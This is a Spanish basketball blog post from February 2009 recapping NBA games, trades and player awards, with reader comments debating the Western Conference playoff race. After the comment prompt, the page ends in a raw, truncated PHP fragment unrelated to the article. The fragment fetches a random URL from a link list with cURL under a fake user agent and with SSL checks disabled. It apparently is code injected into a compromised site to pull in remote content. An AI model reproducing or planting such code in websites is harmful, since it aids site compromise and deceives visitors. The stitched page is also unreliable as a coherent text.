La crónica (18/02/2009)

19 de February de 2009 por MagicJohnson32

dwightcp3Por TheDeerHunter & MagicJohnson32

Anoche disfrutamos de una jornada extensa marcada por los traspasos habidos y por haber… o por los no habidos, como la vuelta de Chandler a los Hornets. De traca oigan…

Ayer teorizábamos con la matanza de pollos que iba a hacer Howard en la débil zona de los Hornets con Chandler recién traspasado. Pues nada de eso. No entendemos bien cómo, pero entre Hilton Armstrong, Marks y Ely se las arreglaron para convertir su, a priori, plácida noche en auténtica pesadilla y dejarle anotar apenas dos canastas en juego en 30 minutos. Por el contrario, CP3 sí generó un desbarajuste importante en la defensa de Orlando y les negó cualquier opción de victoria prácticamente desde el primer minuto. Por ahí van a echar muuucho de menos a Nelson.

Noticioso fue también el debut de “El Otro” O’Neal en Miami, que no pudo ser de peor manera: derrota contra unos Wolves que ya no se juegan nada y, recordemos, no pueden contar con Al Jefferson; todo, a pesar incluso de la gran actuación de Wade. Telfair hizo uno de los partidos de su vida.

lbjmarionEn el otro lado de ese mismo traspaso los Raptors no tuvieron mejor suerte. Al menos su rival cuenta con bastante más caché. Los Cavs, sin despeinarse, dieron buena cuenta de Toronto con Calderón renqueante y sin Bosh. Ilgauskas se movió como pez en el agua en una defensa formada por Bargnani y “minus-Matrix”.

Algo más difícil lo tuvieron los Blazers contra Memphis. Sin Oden y con la mitad de sus hombres involucrados en hipotéticos traspasos, amarraron a duras penas el partido. Mavs y Nets son otros equipos que suenan con fuerza. Kidd devolvió a Harris alguna de las afrentas recibidas dirigiendo a su equipo magistralmente hacia la victoria. Los Bulls sí celebraron su reciente operación ganando en Milwaukee. Hinrich, espectacular. Los Playoffs están en su mano.

Del resto de la jornada destacamos la apurada victoria de Lakers, que perdían por 12 mediado el tercer cuarto en el ORACLE de Oakland, la de los Hawks en Sacramento, también por los pelos, las fáciles de los Nuggets en Philadelphia y de los Suns contra los Clippers (que en dos noches han encajado 282 puntos ante Phoenix) y la de arena que tocaba a unos Pacers que perdieron contra los Bobcats. Vamos a empezar a defender la candidatura de Radma para mejor 6º hombre.

amareebenchPREMIOS

MVP: Vale que los Clippers no están haciendo nada para evitar ser ridiculizados, pero los números de Amaré Stoudemire le elevan a jugador más valioso de la noche: 42 puntos con una efectividad asombrosa (15 de 20 en tiros de campo y 12 de 13 en libres), 11 rebotes y un +38 de parcial en los 36 minutos que disputó. Merece mención Chris Paul con 36 puntos, 10 asistencias, 6 rebotes y 3 robos.

El rookie: Derrick Rose firmó una actuación muy completa con 18 puntos, 9 asistencias, 5 rebotes y 2 robos. Las 7 pérdidas fueron su único lunar.

La sorpresa: 31 puntos, con 8 de 14 en tiros de campo, 5 triples, y 10 de 10 en libres, además de 4 robos y 2 asistencias logró Kirk Hinrich, uno de los jugadores que más ha sonado en los rumores de traspaso (su actuación parece un gran cebo para venderlo a buen precio). Habíamos olvidado que Hinrich era capaz de partidos como el de anoche, pero lo de Telfair, ni lo sabíamos: 30 puntos, 6 triples y 8 asistencias ante los Heat.

La decepción: A los Sixers no les ha sentado nada bien el parón del All-Star. En la derrota de anoche el peor fue Iguodala, que anotó un sólo tiro de campo de los 6 que intentó, atrapó un rebote y fue eliminado por faltas en sólo 27 minutos de juego. También, como ya hemos comentado, esperábamos mucho más de Dwight Howard, que se quedó en 12 puntos, 8 rebotes y 1 tapón, muy lejos de sus promedios.

El mayor esfuerzo en vano: Los 37-12-4-4 de Wade, los 32-6-3 de Richard Jefferson, los 32-11-4 de Kevin Martin, los 33-3-2 de Al Thornton… ninguna de estas actuaciones sirvió para lograr la victoria.

RAZONES PARA TRASNOCHAR

Ya sabéis lo que hay los jueves: pocos pero buenos partidos. En este caso, un doble duelo que enfrenta a dos de los mejores equipos de la liga con dos de los que están teniendo problemas para sacar partido al verdadero potencial de sus plantillas.

duncanpistonsSpurs @ Pistons. Detroit amontona motivos para la preocupación. Al mal juego y los malos resultados (cuatro derrotas seguidas) se les une la amenaza, cada vez menos lejana, de quedarse fuera de los Playoffs. Y quien eche un vistazo a su calendario inmediato tiene nuestro permiso para poner el [Modo PÁNICO ON]: tras recibir a los Spurs visitarán sucesivamente a Cavaliers, Heat, Hornets, Magic y Celtics. Los Spurs vienen de perder dos partidos contra rivales asequibles (Raptors y Knicks) y han visto cómo los Nuggets les han superado en la clasificación. La baja de Ginóbili les complica un poco más las cosas. Veremos esta reedición de las Finales de 2005 a partir de las 2:00, hora peninsular.

Celtics @ Jazz. Con su victoria sobre los Lakers del jueves pasado, los Jazz nos recordaron lo difícil que es ganar en Salt Lake City. Pero los Celtics vienen de ganar de forma consecutiva en New Orleans y Dallas. Los Jazz, que han recuperado a Kirilenko mucho antes de lo previsto, esperan disponer también de Okur para la visita de los Celtics, con lo cual el partido se presenta muy abierto. Ambos se juegan mucho: los Celtics luchan por el liderato del Este y de la liga, mientras los Jazz tratan de mantener su octava posición. El partido se jugará a continuación del Spurs @ Pistons.

La pregunta del día: ¿Quién se quedará fuera en la apretada carrera por los Playoffs del Oeste? ¿Hornets, Blazers, Rockets, Mavs, Jazz o Suns?

Comenta

10 comentarios a esta entrada

  1. Txusma dice:
    #1

    Antes del AllStar hubiera apostado por los Suns pero ahora y más si no traspasan a Amare la cosa me hace dudar. Los Jazz han de recuperar a sus lesionados lo que ha de ser positivo en principio, los Blazers suenan y mucho para reforzarse y NOH tienen a Paul.
    Asi la cosas me quedan Rockets y Mavs. Yo apuesto por Houston.

      Citar

  2. kantonyo dice:
    #2

    yo no soy capaz de mojarme en quien se quedará fuera del oeste. Hay tanta igualdad, y ademas estan siendo todos tan irregulares dentro de sus buenos balances, que es imposible, quitando a Lakers y Nuggets, apostar por uno.

      Citar

  3. couxe dice:
    #3

    A Lakers, Denver y San Antonio los veo seguro en playoff, a Portland y a los Hornets los veo suficientemente fuertes como para no tener problemas, así que creo que será una especie de ruleta rusa entre Rockets, Dallas, Utah y los Suns…
    Si tuviera que apostar por el que se queda fuera, lo haría por los Rockets…

      Citar

  4. telekoman dice:
    #4

    Yo si tuviera que apostar desde luego que lo haría por los Rockets. No están demostrando nada de nada y sus figuras no lo están siendo.

      Citar

  5. Viva_Dirk dice:
    #5

    Yo ya aposté en su dia

      Citar

  6. Viva_Dirk dice:
    #6

      Citar

  7. MagicJohnson32 dice:
    #7

    Y a mí, que me parece que a los Rockets les irá bien la confirmación de que McGrady no jugará más esta temporada… (ojo, que los Rockets aún no lo han confirmado, sólo lo ha hecho el jugador; parece que hay tomate, jeje). Ahora Houston tendrá las ideas más claras, los roles y las jerarquías más marcadas.

      Citar

  8. Viva_Dirk dice:
    #8

    Si, es posible que les venga bien, pero no creo que les llegue para entrar en play-offs, y eso que Von Wafer me parece la mejor noticia que han tenido desde que draftearon a Yao.

      Citar

  9. Jabho dice:
    #9

    Yo apuesto por Utah o Suns fuera….

      Citar

  10. aro_pasado_no_newtoniano dice:
    #10

    ¿Por qué la foto en la que aparece un tio con el 12 de Orlando, tiene la cara de T-mac?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>